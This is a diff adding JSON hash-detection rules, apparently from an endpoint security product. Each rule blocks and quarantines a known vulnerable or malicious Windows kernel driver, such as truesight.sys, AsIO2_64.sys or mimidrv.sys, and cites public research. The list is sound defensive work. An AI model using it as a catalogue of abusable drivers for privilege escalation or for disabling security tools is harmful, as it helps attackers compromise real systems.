+ "hl_testing_start_time": "2026-03-23T11:45:29.979626Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88b901ce8ee199bc371e9cf39ab5375d31c6881a25ba5827e9b32ba7946ecda1",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a3faaa6-dc9f-5d6c-abf3-5f3d6b81832f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821639Z",
+ "creation_date": "2026-03-23T11:45:30.821642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821651Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c9e257c9740561b5744812e1343815e7972c362c8993d972b96a56e18c712f3",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a464168-06e1-5cda-a44f-d05e5c143707",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481289Z",
+ "creation_date": "2026-03-23T11:45:30.481291Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481297Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bcf811040c7552a2c93409a6cd2d63f8abbae121acca012e0b7f4fdc0b6a6b8b",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a541ac9-f8df-5115-b0c2-018022f632ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486906Z",
+ "creation_date": "2026-03-23T11:45:31.486909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486918Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b28842c58a0845fe6cba9c76192f166454ede275d74942de18df2dd3a71eb2a1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a601188-1f95-5eb8-bfab-13dd5b1a273c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144372Z",
+ "creation_date": "2026-03-23T11:45:32.144374Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8c5227d8827405e0e13a16bbacc6959edd3de95bc167566f742a6c221a0fe75",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a859023-f148-5ec1-b7af-4b3a9978fa34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818680Z",
+ "creation_date": "2026-03-23T11:45:31.818684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eeca04c3c5d230fed7aa5cf9a4c5201d9253a6aaf8a68cdd8835b3d845024873",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a8b8ac4-b24c-5521-8f7c-c559463dafe7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807623Z",
+ "creation_date": "2026-03-23T11:45:31.807625Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807631Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c1ec0557e0e5f59b30348ba919bf87feb938c2d1c5672d0aa67ebcd0f12ae86",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a91d3b7-8394-598a-96f7-54c79ddfb442",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473338Z",
+ "creation_date": "2026-03-23T11:45:30.473341Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473350Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "636b4c1882bcdd19b56370e2ed744e059149c64c96de64ac595f20509efa6220",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a98a78f-6e36-54c3-9a22-bc9732e5bfca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818438Z",
+ "creation_date": "2026-03-23T11:45:31.818442Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818451Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "716400501309b00b9003430749a2579b4c35867b6b8b383a83a8f7f76fe9f3d6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2aa40a11-9039-510d-8ddc-ada7a6b7a01b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612957Z",
+ "creation_date": "2026-03-23T11:45:29.612959Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612964Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25bc1b72ba6092674ec561d7de8f5e4a7adb23c29fa68de5b29a30a671257dac",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ab01bd4-47da-5cb2-ae69-c29e057f43ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971202Z",
+ "creation_date": "2026-03-23T11:45:29.971205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971213Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ab22cbf-3327-5822-98fb-7620cbb1720e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613841Z",
+ "creation_date": "2026-03-23T11:45:29.613843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df82f155376b4e95a3f497b7362ba6039c04d2ae78926f626dbe1a459bc626d7",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ab6e22c-f0af-53d5-8c43-ecd3d46c59c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492431Z",
+ "creation_date": "2026-03-23T11:45:31.492433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f7e34a971f2a2a3d473432d9cea4c8d6ec680184e2972230795a1f33406218d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ac2a541-2fc6-5000-9215-4139ef1d61cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817609Z",
+ "creation_date": "2026-03-23T11:45:30.817611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817616Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3678ba63d62efd3b706d1b661d631ded801485c08b5eb9a3ef38380c6cff319a",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2acf40da-baa4-55f7-a6d3-12dc8f88069a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821908Z",
+ "creation_date": "2026-03-23T11:45:31.821910Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821915Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e84886c82660f3bd9b6e04024251bfbb8dbc5690c567feb163cc751d5c00cc2d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ae19c56-8543-5d7f-afc2-f7a040fbcec1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621651Z",
+ "creation_date": "2026-03-23T11:45:29.621653Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ee5067ce48883701824c5b1ad91695998916a3702cf8086962fbe58af74b2d6",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2af7c7d6-9b58-538b-9829-af0506a4b402",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614006Z",
+ "creation_date": "2026-03-23T11:45:29.614008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de",
+ "comment": "Huawei vulnerable drivers (aka HwOs2Ec10x64.sys and HwOs2Ec7x64.sys) [CVE-2019-5241] [https://www.microsoft.com/security/blog/2019/03/25/from-alert-to-driver-vulnerability-microsoft-defender-atp-investigation-unearths-privilege-escalation-flaw/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2af81a35-f15a-506b-aaad-ae8f3e28bcf5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464842Z",
+ "creation_date": "2026-03-23T11:45:30.464845Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fefc070a5f6a9c0415e1c6f44512a33e8d163024174b30a61423d00d1e8f9bf2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b05261b-235b-5527-834b-8bed12ee858b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621513Z",
+ "creation_date": "2026-03-23T11:45:29.621515Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621520Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72322fa8bba20df6966acbcf41e83747893fd173cd29de99b5ad1a5d3bf8f2de",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b0ba12d-b21b-5abe-957a-c358d33a6004",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500708Z",
+ "creation_date": "2026-03-23T11:45:31.500711Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d70435e28f05a78a0cf513383da887cce3b4d311e1407149c72581cb00785aa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b0de7f1-3c19-546a-b09a-938e620febe1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606249Z",
+ "creation_date": "2026-03-23T11:45:29.606252Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606261Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c089a31ac95d41ed02d1e4574962f53376b36a9e60ff87769d221dc7d1a3ecfa",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b1b146a-d57e-5e9f-8fa1-9d5bfc137679",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474396Z",
+ "creation_date": "2026-03-23T11:45:31.474399Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474407Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7282653f7af709a7740d785a93b1ea245ab26d177c1c4a58bf48b9fceae6204",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b251617-d326-5f78-9a83-1ddaeb64d804",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612109Z",
+ "creation_date": "2026-03-23T11:45:29.612111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612116Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
